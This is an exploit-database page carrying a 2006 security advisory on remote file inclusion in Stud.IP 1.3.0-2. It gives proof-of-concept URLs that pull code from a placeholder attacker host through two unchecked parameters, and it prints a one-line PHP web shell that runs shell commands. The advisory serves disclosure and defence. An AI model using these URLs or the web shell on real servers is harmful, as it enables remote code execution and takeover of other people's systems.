header-logo
Suggest Exploit
vendor:
Stud.IP
by:
Hamid Ebadi
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Stud.IP
Affected Version From: studip 1.3.0-2
Affected Version To: studip 1.3.0-2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Stud.IP Remote File Inclusion

Stud.IP is a learning and an information management system for universities, educational facilities and enterprises. Stud.IP is vulnerable to Remote File Inclusion vulnerability which allows an attacker to execute arbitrary PHP code by including files from local or external resources.

Mitigation:

Edit the source code to ensure that input is properly verified.
Source

Exploit-DB raw data:

/*------------------------------------------------
               IHS Public advisory
-------------------------------------------------*/

Stud.IP Remote File Inclusion
Stud.IP is a learning and an information management
system for universities, educational facilities and
enterprises.

http://www.studip.de
http://www.data-quest.de
http://www.sourceforge.net/projects/studip


Discovered by Hamid Ebadi Credit :
all go to IHS team (IHS : IRAN HOMELAND SECURITY)
www.ihsteam.com (persian)
www.ihsteam.net (english)


The original article can be found at:
http://www.hamid.ir/security/
http://www.IHSteam.com

Vulnerable Systems:
       studip 1.3.0-2 and below


Input passed to the "_PHPLIB[libdir]" parameter in
studip-phplib/oohforms.inc and to the
"ABSOLUTE_PATH_STUDIP"  parameter in
studip-htdocs/archiv_assi.php is not properly verified
before being used to include files.
This can be exploited to execute arbitrary PHP code by
including files from local or external resources.

POC Exploits:

The following URL will cause the server to include
external files
http://localhost/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://attacker/cmd.gif?
http://localhost/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://attacker/cmd.gif?

cmd.gif
<?
passthru($_GET['cmd']);
?>

Solution:
Edit the source code to ensure that input is properly verified.


greeting :
LorD , NT , C0d3r of IHS

# milw0rm.com [2006-07-01]